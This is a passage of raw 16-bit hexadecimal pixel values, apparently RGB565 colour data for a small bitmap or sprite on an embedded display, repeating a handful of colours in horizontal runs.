0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0x0000, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x0000, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x0000, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 